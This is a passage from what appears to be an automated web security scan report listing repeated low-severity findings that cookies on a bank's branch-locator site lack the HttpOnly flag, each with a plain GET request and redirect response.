Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.21. http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:16 GMT
Server: Apache
Set-Cookie: JSESSIONID=A367C14802913DF4ABE937D0CBB263FB.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.22. http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=011250AE5A13A38CF96F9A1241DAC4B5.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.23. http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:33 GMT
Server: Apache
Set-Cookie: JSESSIONID=F4C900D662CA7A0F5F4BEFC765BF9D30.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.24. http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:25 GMT
Server: Apache
Set-Cookie: JSESSIONID=C6FFCCBF7720C691E1ED1D8BC5EB52EC.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.25. http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:01 GMT
Server: Apache
Set-Cookie: JSESSIONID=7CBCAB237E9F7F6E9826541166EE7A81.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.26. http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:18 GMT
Server: Apache
Set-Cookie: JSESSIONID=51A8E00BA2BBAD7F6BC3ED01BC38B326.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.27. http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=F48FCD3F99139761C07548549EF0AD9D.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/200__Route__37__E._08753_TOMS__RIVER_NJ/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.28. http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:15 GMT
Server: Apache
Set-Cookie: JSESSIONID=37C1434085D78EDB59F63F2A72F4EF55.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.29. http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:34 GMT
Server: Apache
Set-Cookie: JSESSIONID=EFF5034233F4D115B6EF785BF7FD8226.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/205__E__Pine__St_74106_TULSA_OK/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.30. http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=B9F4CE5182D63E0AC158D6F2F1BBEE1B.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.31. http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:04 GMT
Server: Apache
Set-Cookie: JSESSIONID=8C8902A93FBF9738159DFD0C6BA9F603.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/216__North__Broadway_66762_PITTSBURG_KS/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.32. http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=F9C72641BD8E073ECAA37AAEE2FDC6A2.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.33. http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=189EE5246BADEDFC945E2C5E9A236353.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/2350__SE__Washington__Blvd_74006_BARTLESVILLE_OK/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.34. http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:21 GMT
Server: Apache
Set-Cookie: JSESSIONID=FC59816291B74DE687892283223C8D0A.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.35. http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=E44EB5F369225C8C6E39AF73EA42CB57.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/240__Park__Avenue__South_10003_NEW__YORK_NY/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.36. http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=D5EC7C2133C05D0E13F9455DF4670B3D.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.37. http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=29F8C2ED1E5442E63C543869F81DBC4A.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/243__Rt__130_08505_BORDENTOWN_NJ/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.38. http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=D8354FA0D8FF9EFB325E7E09AE3DA931.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.39. http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:18:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=B1B58B72FB7AB331735AFECF24EEDAD6.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/345__Park__Avenue__South_10010_NEW__YORK_NY/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.40. http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:15 GMT
Server: Apache
Set-Cookie: JSESSIONID=8923C20A968F594EF9DC3705A8255435.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.41. http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:37 GMT
Server: Apache
Set-Cookie: JSESSIONID=D1958F08DF13B0C38D1F7352D4279CCB.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
